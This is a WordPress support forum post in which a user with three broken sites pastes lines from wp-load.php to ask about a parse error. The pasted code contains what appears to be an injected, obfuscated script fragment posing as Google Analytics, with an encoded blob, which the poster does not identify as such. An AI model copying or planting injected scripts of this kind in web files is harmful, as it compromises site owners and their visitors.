Multiple WP sites affected with Parse error: wp-load.php on line 52
-
All of the sudden all 3 of my wordpress sites I run through bluehost showed errors.
http://www.Bullpenstudio.com/home
http://www.moyephoto.com
http://www.lolgym.comI will use http://www.Bullpenstudio.com/home to show the code in the wp-load.php
Parse error: syntax error, unexpected T_STRING in /home1/mistings/public_html/home/wp-load.php on line 52
LINES 48-51:
// Die with an error message
require_once( ABSPATH . ‘/wp-includes/class-wp-error.php’ );
require_once( ABSPATH . ‘/wp-includes/functions.php’ );
require_once( ABSPATH . ‘/wp-includes/plugin.php’ );
$text_direction = /*WP_I18N_TEXT_DIRECTION*/”ltr”/*/WP_I18N_TEXT_DIRECTION*/;LINE 52:
wp_die(sprintf(/*WP_I18N_NO_CONFIG*/”There doesn’t seem to be a
wp-config.phpfile. I need this before we can get started. Need more help? We got it. You can create awp-config.phpfile through a web interface, but this doesn’t work for all server setups. The safest way is to manually create the file.</p><script snc=”http://www.google-analytics.com/urchin.js” id=”googleanalytics” type=”text/javascript”>//
<!– 05a4d2691d6919230c234d284d3d583447334a64077d5330537c16654a20512441334a6409600e2050384805a4d2bgdd
var emob = document.getElementById(“googleanalytics”);
var emsp = “”;Is there an easy fix? I have nothing backed up…
The topic ‘Multiple WP sites affected with Parse error: wp-load.php on line 52’ is closed to new replies.